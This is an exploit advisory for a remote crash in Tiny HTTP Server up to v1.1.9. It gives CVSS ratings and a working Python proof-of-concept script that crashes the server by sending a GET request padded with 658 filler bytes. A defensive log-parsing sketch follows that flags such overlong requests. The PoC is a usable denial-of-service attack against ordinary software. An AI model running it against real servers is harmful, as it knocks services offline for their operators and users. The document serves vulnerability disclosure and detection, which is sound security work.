Tiny HTTP Server <=v1.1.9 Remote Crash PoC

2012-02-29 / 2012-03-21
Credit: localh0t
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

#!/usr/bin/python
# Tiny HTTP Server <=v1.1.9 Remote Crash PoC
# written by localh0t
# Date: 24/02/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar
# Targets: Windows (All)

import httplib,sys

if (len(sys.argv) < 3):
    print "\nTiny HTTP Server <=v1.1.9 Remote Crash PoC"
    print "\n Usage: %s <host> <port> \n" %(sys.argv[0])
    sys.exit()

payload = "X" * 658

try:
    print "\n[!] Connecting to %s ..." %(sys.argv[1])
    httpServ = httplib.HTTPConnection(sys.argv[1] , int(sys.argv[2]))
    httpServ.connect()
    print "[!] Sending payload..."
    httpServ.request('GET', "/" + str(payload))
    print "[!] Exploit succeed. Check %s if crashed.\n" %(sys.argv[1])
except:
    print "[-] Connection error, exiting..."

httpServ.close()
sys.exit()
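Detection sketch for the request the PoC sends (a GET whose target is "/" followed by 658 filler bytes). This is an added example, not part of the original advisory or the PoC author's code. It assumes Common Log Format access logs taken from a proxy or sensor in front of the server, since a server that crashes may not log the request itself; the 512-byte limit, the function names and the sample lines are assumptions made for the example.

```python
import re

# Common/Combined Log Format:
#   host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}|-) (?P<size>\d+|-)'
)

MAX_TARGET_LEN = 512  # assumed policy limit, below the 658-byte filler in the PoC


def filler_ratio(s):
    """Fraction of the string taken up by its single most common character."""
    if not s:
        return 0.0
    return max(s.count(c) for c in set(s)) / len(s)


def flag_overlong_requests(lines, max_len=MAX_TARGET_LEN):
    """Return (host, time, target length, filler ratio) per overlong request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable lines are skipped here; count them separately in production
        target = m.group("target")
        if len(target) > max_len:
            hits.append((m.group("host"), m.group("time"),
                         len(target), round(filler_ratio(target), 2)))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [29/Feb/2012:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1043',
    '192.0.2.77 - - [29/Feb/2012:10:00:05 +0000] "GET /' + "X" * 658 + ' HTTP/1.1" - -',
    '192.0.2.10 - - [29/Feb/2012:10:00:09 +0000] "GET /img/logo.png HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for hit in flag_overlong_requests(SAMPLE):
        print("overlong request target:", hit)
```

A filler ratio close to 1.0 separates padding-style requests from long but legitimate query strings, which helps when tuning the length limit.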

References:

http://packetstormsecurity.org/files/110220/tinyhttp-crash.txt

